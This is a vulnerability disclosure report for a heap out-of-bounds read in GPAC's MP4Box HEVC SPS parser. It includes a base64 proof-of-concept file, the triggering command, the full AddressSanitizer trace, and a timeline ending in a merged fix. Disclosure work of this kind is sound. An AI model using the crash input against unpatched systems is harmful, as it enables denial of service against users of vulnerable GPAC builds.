Heap-based Buffer Overflow in gpac/gpac

Status: Valid

Reported on: Feb 17th 2022


Description

Heap-based Buffer Overflow in gpac: AddressSanitizer reports a 4-byte heap out-of-bounds read in gf_hevc_read_sps_bs_internal (src/media_tools/av_parsers.c:8202) while MP4Box -info parses the HEVC SPS of the attached file. The read lands 4240 bytes past the end of a 157376-byte buffer allocated in naludmx_configure_pid (src/filters/reframe_nalu.c:348).

Proof of Concept

Version:

MP4Box - GPAC version 1.1.0-DEV-rev1762-g90a145735-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D

System information: Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

PoC file (base64 encoded):
Q0FDMAAA//RkRDIAAgwAAAA/////dQE/AAABQAAAAUEAAAFC3f//AAAAAURAAAABQQEAGELdABAA
AH//+fn5+Qj6REZERERET0RYZHMQAAB///n53PoV+URGRBRERFhEHUwAAFtERERERERE

command:

./MP4Box -info poc

Result

~/fuzzing/gpac/gpac/bin/gcc/MP4Box -info ./poc
=================================================================
==64177==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f21c83a7f50 at pc 0x7f21cc2b7304 bp 0x7ffe63c7db10 sp 0x7ffe63c7db08
READ of size 4 at 0x7f21c83a7f50 thread T0
    #0 0x7f21cc2b7303 in gf_hevc_read_sps_bs_internal /home/aidai/fuzzing/gpac/gpac/src/media_tools/av_parsers.c:8202:54
    #1 0x7f21cc2bac14 in gf_hevc_parse_nalu_bs /home/aidai/fuzzing/gpac/gpac/src/media_tools/av_parsers.c:8629:30
    #2 0x7f21cd047756 in naludmx_parse_nal_hevc /home/aidai/fuzzing/gpac/gpac/src/filters/reframe_nalu.c:2164:8
    #3 0x7f21cd047756 in naludmx_process /home/aidai/fuzzing/gpac/gpac/src/filters/reframe_nalu.c:3059:23
    #4 0x7f21ccac918f in gf_filter_process_task /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter.c:2573:7
    #5 0x7f21cca8a32d in gf_fs_thread_proc /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_session.c:1799:3
    #6 0x7f21cca86cc7 in gf_fs_run /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_session.c:2043:2
    #7 0x7f21cc331e43 in gf_media_import /home/aidai/fuzzing/gpac/gpac/src/media_tools/media_import.c:1225:3
    #8 0x5657dc in convert_file_info /home/aidai/fuzzing/gpac/gpac/applications/mp4box/fileimport.c:128:6
    #9 0x50f745 in mp4boxMain /home/aidai/fuzzing/gpac/gpac/applications/mp4box/main.c:6052:6
    #10 0x7f21cb0e70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x429b9d in _start (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x429b9d)

0x7f21c83a7f50 is located 4240 bytes to the right of 157376-byte region [0x7f21c8380800,0x7f21c83a6ec0)
allocated by thread T0 here:
    #0 0x4a22dd in malloc (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x4a22dd)
    #1 0x7f21cd039aad in naludmx_configure_pid /home/aidai/fuzzing/gpac/gpac/src/filters/reframe_nalu.c:348:25
    #2 0x7f21cc9f31a5 in gf_filter_pid_configure /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_pid.c:752:6
    #3 0x7f21cca1c039 in gf_filter_pid_connect_task /home/aidai/fuzzing/gpac/gpac/src/filter_core/filter_pid.c:1061:3

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aidai/fuzzing/gpac/gpac/src/media_tools/av_parsers.c:8202:54 in gf_hevc_read_sps_bs_internal
Shadow bytes around the buggy address:
  0x0fe4b906cf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906cfd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0fe4b906cfe0: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa
  0x0fe4b906cff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe4b906d000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe4b906d010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe4b906d020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe4b906d030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==64177==ABORTING
Timeline

We are processing your report and will contact the gpac team within 24 hours. (3 months ago)
We have contacted a member of the gpac team and are waiting to hear back. (3 months ago)
gpac/gpac maintainer (3 months ago): https://github.com/gpac/gpac/issues/2124
We have sent a follow up to the gpac team. We will try again in 7 days. (3 months ago)
We have sent a second follow up to the gpac team. We will try again in 10 days. (3 months ago)
gpac/gpac maintainer validated this vulnerability. (3 months ago)
aidaip has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
gpac/gpac maintainer confirmed that a fix has been merged on aa8f03. (3 months ago)
The fix bounty has been dropped.